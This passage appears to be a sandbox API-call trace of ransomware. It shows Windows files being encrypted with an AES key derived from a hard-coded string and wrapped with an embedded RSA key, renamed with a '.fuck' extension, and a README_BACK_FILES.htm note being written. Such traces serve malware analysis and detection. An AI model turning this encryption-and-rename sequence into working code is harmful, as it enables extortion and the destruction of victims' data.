pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.969] CryptEncrypt (in: hKey=0x28be458, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d5ff8*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28d5ff8*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.969] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d5ff8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.969] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.969] CryptEncrypt (in: hKey=0x28be358, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.969] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.969] CloseHandle (hObject=0xffffffff) returned 1 [0239.969] CloseHandle (hObject=0xffffffff) returned 1 [0239.969] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml"), bFailIfExists=0) returned 0 [0239.970] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml", dwFileAttributes=0x0) returned 0 [0239.970] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml.gsg")) returned 0 [0239.971] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml.fuck")) returned 0 [0239.971] CryptDestroyHash (hHash=0x28bf218) returned 1 [0239.971] CryptDestroyKey (hKey=0x28be358) returned 1 [0239.971] CryptReleaseContext (hProv=0x28d4d60, dwFlags=0x0) returned 1 [0239.971] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.971] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28bf218 [0239.972] FindNextFileA (in: hFindFile=0x28bf218, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.972] FindNextFileA (in: hFindFile=0x28bf218, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.972] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x28bee18 [0239.972] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0239.972] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0239.972] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0239.972] GetLastError () returned 0x5 [0239.972] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_0.provxml")) returned 0x20 [0239.972] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x80) returned 0 [0239.973] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_0.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.973] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_0.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.974] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_0.provxml.gsg", dwFileAttributes=0x2) returned 0 [0239.974] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28d64c0) returned 1 [0239.976] CryptCreateHash (in: hProv=0x28d64c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0239.976] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0239.976] CryptHashData (hHash=0x28be818, pbData=0x2857290, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.976] CryptDeriveKey (in: hProv=0x28d64c0, Algid=0x6610, hBaseData=0x28be818, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28be858) returned 1 [0239.977] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.977] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0239.977] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28d6900) returned 1 [0239.977] CryptImportPublicKeyInfo (in: hCryptProv=0x28d6900, dwCertEncodingType=0x1, pInfo=0x28ca848*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28ca878*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28ca880*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28be658) returned 1 [0239.977] CryptEncrypt (in: hKey=0x28be658, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0239.977] CryptEncrypt (in: hKey=0x28be658, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d76d0*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28d76d0*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0239.977] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d76d0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.978] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0239.978] CryptEncrypt (in: hKey=0x28be858, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0239.978] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.978] CloseHandle (hObject=0xffffffff) returned 1 [0239.978] CloseHandle (hObject=0xffffffff) returned 1 [0239.978] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_0.provxml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_0.provxml"), bFailIfExists=0) returned 0 [0239.978] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x0) returned 0 [0239.979] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_0.provxml.gsg")) returned 0 [0239.979] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_0.provxml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_0.provxml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_0.provxml.fuck")) returned 0 [0239.980] CryptDestroyHash (hHash=0x28be818) returned 1 [0239.980] CryptDestroyKey (hKey=0x28be858) returned 1 [0239.980] CryptReleaseContext (hProv=0x28d64c0, dwFlags=0x0) returned 1 [0239.980] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0239.980] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0239.980] GetLastError () returned 0x5 [0239.980] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_1.provxml")) returned 0x20 [0239.980] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_1.provxml", dwFileAttributes=0x80) returned 0 [0239.981] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_1.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.981] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_1.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.981] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_1.provxml.gsg", dwFileAttributes=0x2) returned 0 [0239.982] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28d6218) returned 1 [0239.984] CryptCreateHash (in: hProv=0x28d6218, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0239.984] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0239.984] CryptHashData (hHash=0x28be358, pbData=0x2857290, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.984] CryptDeriveKey (in: hProv=0x28d6218, Algid=0x6610, hBaseData=0x28be358, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28be818) returned 1 [0239.984] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.984] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0239.984] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28d78f0) returned 1 [0239.985] CryptImportPublicKeyInfo (in: hCryptProv=0x28d78f0, dwCertEncodingType=0x1, pInfo=0x28ca918*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28ca948*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28ca950*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28be8d8) returned 1 [0239.985] CryptEncrypt (in: hKey=0x28be8d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0239.985] CryptEncrypt (in: hKey=0x28be8d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d7180*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28d7180*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0239.985] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d7180, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.985] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0239.985] CryptEncrypt (in: hKey=0x28be818, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0239.985] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.985] CloseHandle (hObject=0xffffffff) returned 1 [0239.985] CloseHandle (hObject=0xffffffff) returned 1 [0239.985] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_1.provxml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_1.provxml"), bFailIfExists=0) returned 0 [0239.986] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_1.provxml", dwFileAttributes=0x0) returned 0 [0239.986] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_1.provxml.gsg")) returned 0 [0239.987] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_1.provxml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\Power_1.provxml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\power_1.provxml.fuck")) returned 0 [0239.987] CryptDestroyHash (hHash=0x28be358) returned 1 [0239.987] CryptDestroyKey (hKey=0x28be818) returned 1 [0239.987] CryptReleaseContext (hProv=0x28d6218, dwFlags=0x0) returned 1 [0239.987] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0239.987] FindClose (in: hFindFile=0x28bee18 | out: hFindFile=0x28bee18) returned 1 [0239.988] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\readme_back_files.htm")) returned 0xffffffff [0239.988] AreFileApisANSI () returned 1 [0239.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28d4d60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 117 [0239.988] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.988] GetLastError () returned 0x5 [0239.988] GetLastError () returned 0x5 [0239.988] FindNextFileA (in: hFindFile=0x28bf218, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.988] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0239.988] GetLastError () returned 0x5 [0239.988] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml")) returned 0x20 [0239.989] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml", dwFileAttributes=0x80) returned 0 [0239.989] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.989] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.990] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.990] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28d4d60) returned 1 [0239.992] CryptCreateHash (in: hProv=0x28d4d60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0239.993] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0239.993] CryptHashData (hHash=0x28bee18, pbData=0x2856db8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.993] CryptDeriveKey (in: hProv=0x28d4d60, Algid=0x6610, hBaseData=0x28bee18, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28be958) returned 1 [0239.993] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.993] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0239.993] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28d64c0) returned 1 [0239.993] CryptImportPublicKeyInfo (in: hCryptProv=0x28d64c0, dwCertEncodingType=0x1, pInfo=0x28ca6a8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28ca6d8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28ca6e0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28be998) returned 1 [0239.993] CryptEncrypt (in: hKey=0x28be998, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0239.993] CryptEncrypt (in: hKey=0x28be998, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d6218*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28d6218*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0239.994] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d6218, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.994] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0239.994] CryptEncrypt (in: hKey=0x28be958, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, 